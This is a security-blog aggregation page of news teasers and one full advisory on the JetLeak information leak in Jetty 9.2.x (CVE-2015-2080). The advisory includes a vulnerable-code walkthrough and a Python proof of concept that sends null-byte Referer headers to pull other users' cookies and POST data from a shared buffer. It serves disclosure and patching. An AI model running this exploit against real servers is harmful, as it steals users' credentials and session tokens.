Select Page

It’s Not Who You Know, But What You Don’t Know…

It’s Not Who You Know, But What You Don’t Know…, ,,

I’ve discussed the issue of IT Security having access to accurate, comprehensive and up-to-date information on the IT infrastructure in previous posts, but after a recent conversation with a customer regarding incident response I wanted to revisit the subject in a somewhat oblique manner. With incident response there are two dimensions of information you need…

The post It’s Not Who You Know, But What You Don’t Know… appeared first on Speaking of Security – The RSA Blog and Podcast.

, Security Bloggers Network, John McDonald, ,

Infographic: What’s Threatening Your Mobile Apps?

Infographic: What’s Threatening Your Mobile Apps?

Infographic: What’s Threatening Your Mobile Apps?, ,, Meet the Mobile Menace

In the Star Trek fictional universe, high tech shields provided starships, space stations and planets with protection against threats and damage. If a shield was projected around a ship or other body, it could deflect projectiles and even weapons of enemies. The deflector shields operated by creating a layer, or layers, of energetic distortion around the object that needed to be protected. When it comes to information security, we face similar challenges to Capitan Kirk and his Starship Enterprise; it’s just that the Klingons are replaced with a different kind… Read more

The post Infographic: What’s Threatening Your Mobile Apps? appeared first on VASCO Data Security – Blog.

, Security Bloggers Network, Theresa Damato, ,

Webnic Registrar Blamed for Hijack of Lenovo, Google Domains

Webnic Registrar Blamed for Hijack of Lenovo, Google Domains, ,, Two days ago, attackers allegedly associated with the fame-seeking group Lizard Squad briefly hijacked Google’s Vietnam domain ( On Wednesday, was similarly attacked. Sources now tell KrebsOnSecurity that both hijacks were possible because the attackers seized control over, the Malaysian registrar that serves both domains and 600,000 others., Security Bloggers Network, BrianKrebs, ,

Prohibiting RC4 Cipher Suites

Prohibiting RC4 Cipher Suites, ,,

If you’ve been following the drafts of this RFC, then nothing here will surprise you. The first draft was published on July 21, 2014, and, a short seven months later, RFC 7465 has been published. It’s a great idea for an RFC that I’d like to see used more frequently, but more on that in […]… Read More

The post Prohibiting RC4 Cipher Suites appeared first on The State of Security.

, Security Bloggers Network, Tyler Reguly, ,

Demystifying iOS Enterprise Certificates

Demystifying iOS Enterprise Certificates, ,,

For the past several months, the major threats to mobile security, especially within large enterprises have relied on exploiting one thing – iOS Enterprise Certificates. Wirelurker, one of the first significant malwares to affect non-jailbroken devices and Masque Attack, a family of vulnerability in iOS, one of which Wirelurker exploits proved a lethal combination. With […]… Read More

The post Demystifying iOS Enterprise Certificates appeared first on The State of Security.

, Security Bloggers Network, Tripwire Guest Authors, ,

New iPhone or iPad? Change these iOS 8 privacy settings immediately

New iPhone or iPad? Change these iOS 8 privacy settings immediately, ,, Before you sync your iCloud or reinstall your apps, you need to lock down your new iPhone or iPad. Here are the important tweaks you need to protect your privacy., Security Bloggers Network, ZDNet | Zero Day RSS, ,

JetLeak Vulnerability: Remote Leakage of Shared Buffers in Jetty Web Server [CVE-2015-2080]

JetLeak Vulnerability: Remote Leakage of Shared Buffers in Jetty Web Server [CVE-2015-2080]

JetLeak Vulnerability: Remote Leakage of Shared Buffers in Jetty Web Server [CVE-2015-2080], ,,


GDS discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests submitted to the server by other users. I know that sentence is a mouthful, so take a brief moment to digest it, or simply keep reading to understand what that means. Simply put, if you’re running a vulnerable version of the Jetty web server, this can lead to the compromise of sensitive data, including data passed within headers (e.g. cookies, authentication tokens, Anti-CSRF tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.). (GDS also observed this data leakage vulnerability with responses as well, but for brevity this blog post will concentrate on requests)

The root cause of this vulnerability can be traced to exception handling code that returns approximately 16 bytes of data from a shared buffer when illegal characters are submitted in header values to the server. An attacker can exploit this behavior by submitting carefully crafted requests containing variable length strings of illegal characters to trigger the exception and offset into the shared buffer. Since the shared buffer contains user submitted data from previous requests, the Jetty server will return specific data chunks (approximately 16-bytes in length) from the user’s request depending on the attacker’s payload offset.

Am I vulnerable?

This vulnerability affects versions 9.2.3 to 9.2.8. GDS also found that beta releases and later (including the beta releases of 9.3.x) are vulnerable.

We have created a simple python script that can be used to determine if a Jetty HTTP server is vulnerable. The script code can be downloaded from the GDS Github repository below:

Walkthrough of Vulnerable Code

When the Jetty web server receives a HTTP request, the below code is used to parse through the HTTP headers and their associated values. This walkthrough will focus primarily on the parsing of the header values. The server begins by looping through each character for a given header value and checks the following:

  • On Line 1164, the server checks if the character is printable ASCII or not a valid ASCII character
  • On Line 1172, the server checks if the character is a space or tab
  • On Line 1175, the server checks if the character is a line feed

If the character is non-printable ASCII (or less than 0x20), then all of the checks above are skipped over and the code throws an ‘IllegalCharacter’ exception on line 1186, passing in the illegal character and a shared buffer.


 920: protected boolean parseHeaders(ByteBuffer buffer) 921: { [..snip..] 1163:     case HEADER_VALUE: 1164:         if (ch>HttpTokens.SPACE || ch<0) 1165:         { 1166:             _string.append((char)(0xff&ch)); 1167:             _length=_string.length(); 1168:             setState(State.HEADER_IN_VALUE); 1169:             break; 1170:         } 1171: 1172:         if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB) 1173:            break; 1174: 1175:         if (ch==HttpTokens.LINE_FEED) 1176:         { 1177:             if (_length > 0) 1178:             { 1179:                 _value=null; 1180:                 _valueString=(_valueString==null)?                              takeString():(_valueString+” “+                              takeString()); 1181:             } 1182:             setState(State.HEADER); 1183:             break; 1184:         } 1185: 1186:         throw new IllegalCharacter(ch,buffer); 

In the definition of the ‘IllegalCharacter’ method, the server returns an error message. The error message is a format string composed of the illegal character, a static string that represents whether the exception occurred in the header name or header value, and finally a String that outputs some content of the shared buffer via a call to ‘BufferUtil.toDebugString’.


 1714: private class IllegalCharacter extends BadMessage 1715: { 1716:     IllegalCharacter(byte ch,ByteBuffer buffer) 1717:     { 1718:         super(String.format(“Illegal character 0x%x                        in state=%s in '%s’”,ch,_state,                       BufferUtil.toDebugString(buffer))); 1719:     } 1720: } 

In the ‘toDebugString’ method, there is a call to ‘appendDebugString’, which accepts a StringBuilder object as its first parameter and the shared buffer object as the second parameter. The StringBuilder object will be populated by the ‘appendDebugString’ method and ultimately returned to the user.


  963: public static String toDebugString(ByteBuffer buffer)  964: {  965:     if (buffer == null)  966:         return “null”;  967:     StringBuilder buf = new StringBuilder();  968:     appendDebugString(buf,buffer);  969:     return buf.toString();  970: } 

Since the shared buffer contains data from previous requests, in order for the attacker to retrieve specific data in the shared buffer, their goal is to create a long enough string of illegal characters to overwrite non-important data in the previous request up until the data the attacker wants (e.g. Cookies, authentication tokens, etc.). When the code on line 996 executes, the server reads 16 bytes from the shared buffer before appending “…”. Since the attacker already off-setted into the previous request via an appropriate length string of illegal characters, these 16 bytes should contain sensitive user data from a previous user’s request.


 972:  private static void appendDebugString(StringBuilder buf,ByteBuffer buffer) 973: { [..snip..] 983:     buf.append(<<<); 984:     for (int i = buffer.position(); i < buffer.limit(); i++) 985:     { 986:         appendContentChar(buf,buffer.get(i)); 987:         if (i == buffer.position() + 16 &&                       buffer.limit() > buffer.position() + 32) 988:         { 989:             buf.append(“…”); 990:             i = buffer.limit() - 16; 991:         } 992:     } 993:     buf.append(>>>); 994:     int limit = buffer.limit(); 995:     buffer.limit(buffer.capacity()); 996:     for (int i = limit; i < buffer.capacity(); i++) 997:     { 998:         appendContentChar(buf,buffer.get(i)); 999:         if (i == limit + 16 &&                      buffer.capacity() > limit + 32) 1000:        { 1001:             buf.append(“…”); 1002:             i = buffer.capacity() - 16; 1003:         } 1004:     } 1005:     buffer.limit(limit); 1006: } 
Additional places where IllegalCharacter is called in 9.2.x codebase (line numbers may differ):

The section below provides a walkthrough of how a malicious user could exploit this vulnerability to read sensitive data from another user’s HTTP requests (e.g. cookies, authentication headers, credentials or sensitive data submitted within URLs or POST data).

Exploit Walkthrough

Step 1:

The HTTP request below represents a sample request sent by a victim to the Jetty web server (version 9.2.7.v20150116). Notice the ‘Cookie’ and POST body parameters sent to the server since these will be the values that will be targeted within our proof of concept.

Reproduction Request (VICTIM):

 POST /test-spec/test HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64; rv:35.0) Gecko/20100101 Cookie: password=secret Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 13  param1=test 

Reproduction Response (VICTIM):

 HTTP/1.1 200 OK Set-Cookie: visited=yes Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html Server: Jetty(9.2.7.v20150116) Content-Length: 3460 

Step 2:

As the attacker, craft a request to the same endpoint, but remove the contents of the ‘Referer’ header and replace it with a string of illegal characters. In this particular case, the string contains 44 null bytes. One could conceivably use any non-ASCII character less than 0x20 (other than line-feed since the code handles it specially).

Note, the process of figuring out the correct length of characters for the illegal character string is an iterative process. The suggestion is to start with a small string and work towards a larger size string. If the attacker starts with too large of a string they risk overwriting sensitive data from the previous request. Ideally, the attacker wants to overwrite data in the previous request up until the beginning of the sensitive data. The code will then read 16 bytes of sensitive data and return it to the attacker.

 import httplib, urllib  conn = httplib.HTTPConnection("")  headers = {"Referer": chr(0)*44} conn.request("POST", "/test-spec/test", "", headers) r1 = conn.getresponse() print r1.status, r1.reason 

Step 3:

Once the script is run and the malicious payload is sent to the server, the attacker should receive a response similar to the one below. Notice that the cookie value is contained within the response. Since it is conceivable that the attacker may want to obtain a value greater than 16 bytes in length, the script above can be run multiple times to get additional 16 byte chunks from the buffer.

Step 4:

To read the POST body parameters, the attacker can modify the length of the illegal character string to offset further into the shared buffer as shown below.



Currently, if you are running one of the vulnerable Jetty web server versions, Jetty recommends that you upgrade to version 9.2.9.v20150224 immediately.

Organizations should also be aware that Jetty may be bundled within third party products. We recommend referring to the Jetty Powered website for a list of products (not exhaustive) that utilize Jetty. Due to Jetty being a fairly lightweight HTTP server, it is also commonly used by a variety of embedded systems. Organizations should contact any vendors that may be running a Jetty web server in order to determine if their products are vulnerable and when any patches to resolve this vulnerability will be made available.

Disclosure Timeline

  • Feb 19, 2015 – Vulnerability report sent to using SendSafely
  • Feb 23, 2015 – Jetty team downloads the vulnerability report
  • Feb 24, 2015 – Jetty team releases HTTP Server v9.2.9.v20150224 with bug fix and publicly discloses vulnerability with exploit code
  • Feb 25, 2015 – GDS publicly discloses vulnerability

GDS commends the Jetty development team on their timely response and swift remediation. It should be noted that the decision to publicly disclose the vulnerability was made by the Jetty development team, independent of GDS. GDS’ blog post was published after it was discovered that Jetty had publicly disclosed the vulnerability.

, Security Bloggers Network, Stephen Komal, ,

Lenovo’s website hijacked (briefly) by High School Musical-loving hackers

Lenovo’s website hijacked (briefly) by High School Musical-loving hackers, ,, Just when they probably imagined they were over the worst… Lenovo’s website has been hijacked – and emails compromised – by the Lizard Squad gang. , Security Bloggers Network, Graham Cluley, ,

Leave Things Better Than When You Found Them

Leave Things Better Than When You Found Them, ,, I recently posted the below on the SANS Internet Storm Center site.Whether at the end of a project or at the end of your time with an organization, there are some low impact and high reward actions you can take to ensure that you leave things bett…, Security Bloggers Network, SecurityEverAfter, ,

%d bloggers like this: